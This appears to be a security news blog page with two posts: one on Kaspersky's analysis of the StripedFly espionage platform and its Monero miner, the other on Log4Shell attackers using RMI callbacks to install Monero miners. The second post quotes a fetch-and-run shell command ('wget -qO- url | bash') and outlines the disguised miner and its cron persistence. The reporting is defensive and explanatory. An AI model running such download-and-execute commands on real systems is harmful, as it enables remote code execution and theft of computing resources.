Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Monero Miner. Show all posts

StripedFly: Cryptomining Tool Infects 1 Million Targets Worldwide


Security firm Kaspersky Lab has revealed that a cryptominer, which never really generated a hefty crypto amount for its operators, is now a part of a bigger digital espionage campaign. Since 2017, the platform, known as StripedFly, has infected over a million Windows and Linux targets worldwide. StripedFly was most likely developed as a component of a well-funded state espionage program rather than a cybercriminal operation because it is modular and has several components for infiltrating targets' devices and gathering various types of data. Additionally, it has an update system that allows attackers to add new features and upgrades to the malware. 

Among other malware, StripedFly can steal access credentials from targeted systems, and take capture screenshots, obtain databases, private files, movies, or other relevant data, and record audio in real time by breaking into a target's microphone. Interestingly, StripedFly conceals communication and exfiltration between the malware and its command-and-control servers using a novel, proprietary Tor client. 

Additionally, there is a ransomware component that has occasionally been used by attackers. Using a modified version of the infamous EternalBlue exploit that was published by the US National Security Agency, it first infects targets.

While StripFly can steal Monera cryptocurrency, that is only a portion of what it is capable of. The researchers found this out last year and thoroughly examined it before making their results public.

Kaspersky researchers Sergey Belov, Vilen Kamalov, and Sergey Lozhkin wrote in the post, "What we discovered was completely unexpected; the cryptocurrency miner was just one component of a much larger entity."

According to the researchers, the platform is essentially "a hallmark of APT malware" since it has update and delivery capabilities via reliable services like Bitbucket, GitHub, and GitLab—all of which use specially encrypted archives—as well as an integrated Tor network tunnel for communication with command-and-control (C2) servers./ The researchers further notes that discovering the breadth of StripedFly is ‘astonishing,’ taking into account its successful evasion from getting detected in six years. 

How Does StripedFly Operates? 

The main structural component of the malware is a monolithic binary code that could be expanded by the attackers through different pluggable modules. Every module, whether for added functionality or to offer a service, is in charge of setting up and maintaining its own callback function in order to communicate with a C2 server.

The platform initially emerges on a network as a PowerShell that seems to leverage a server message block (SMB) attack, which looks to be a modified variant of EternalBlue. EternalBlue was first discovered in April 2017 and is still a danger to unpatched Windows systems.

Depending on the availability of its PowerShell interpreter and certain privileges made available in the process, the malware uses a variety of methods for persistence. The researchers notes that, "typically, the malware would be running with administrative privileges when installed via the exploit, and with user-level privileges when delivered via the Cygwin SSH server," the researchers wrote.

The functionality modules are wide and varied, giving attackers a range of options that enable them to continuously monitor a victim's network activity. The modules include the Monero cryptominer mentioned earlier, as well as a variety of command handlers, a credential harvester, repeatable tasks that can record microphone input, take screenshots, and carry out other tasks on a scheduled basis, a reconnaissance module that gathers a lot of system data, and SMBv1 and SSH infectors for worming and penetration capabilities.

Log4j Attackers Switch to Injecting Monero Miners via RMI

 

The most significant vulnerability identified recently has dominated the news over the last few days. The vulnerability, Log4Shell or LogJam and officially termed CVE-2021-44228, is an unauthenticated RCE flaw that permits total system control on systems running Log4j 2.0-beta9 through 2.14.1. 

As per BleepingComputer, some threat actors using the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI, or even merged the two in a single request, to boost their chances of success. This is a big step forward in the ongoing attack, and firms should be aware of it as they try to secure all possible channels. 

For the time being, threat actors attempting to steal resources for Monero mining have identified this trend, but others may follow suit at any time. The majority of attacks targeting the Log4j "Log4Shell" vulnerability have used the LDAP (Lightweight Directory Access Protocol) service. 

Switching to the RMI (Remote Method Invocation) API may appear counter-intuitive at first sight, given that this technique is subject to additional checks and limitations. 

However, this is not always the case, and if we consider that some JVM (Java Virtual Machine) versions may not have strict rules, RMI may be a more easy way to do RCE (remote code execution) than LDAP. Furthermore, LDAP queries have become a well-established part of the infection chain, and defenders are keeping a close eye on them. Many IDS/IPS solutions, for example, currently filter requests using JNDI and LDAP, thus RMI may be disregarded for the time being. In some cases, Juniper recognised both RMI and LDAP services in the same HTTP POST request. 

As per the source, “This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script. During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine."

"This obfuscated script downloads a randomly named file of the form n.png, where n is a number between 0 and 7. Despite the purported file extension, this is actually a Monero cryptominer binary compiled for x84_64 Linux targets. The full script also adds persistence via the cron subsystem."

"A different attack, also detected by Juniper Threat Labs, tries both RMI and LDAP services in the same HTTP POST request in hopes that at least one will work. The LDAP injection string is sent as part of the POST command body. An exploit string in the POST body which is unlikely to succeed given most applications do not log the post body, which can be binary or very large, but by tagging the string as “username” in the JSON body, the attackers hope to exploit applications that will treat this request as a login attempt and log the failure."

Threat actors appear to be interested in mining Monero on hacked devices and promote it as an apparently innocent activity that "ain't going to hurt anyone else." The miner is built for x86 64 Linux systems and uses the cron subsystem for persistence. Even though the majority of attacks have targeted Linux systems. 

CheckPoint states to have discovered the first Win32 program to use Log4Shell, called 'StealthLoader.' by its investigators. 

The only way to combat what has become one of the most serious vulnerabilities in recent history is to upgrade Log4j to version 2.16.0. Administrators should also keep an eye on Apache's security area for new version announcements and execute them as soon as possible.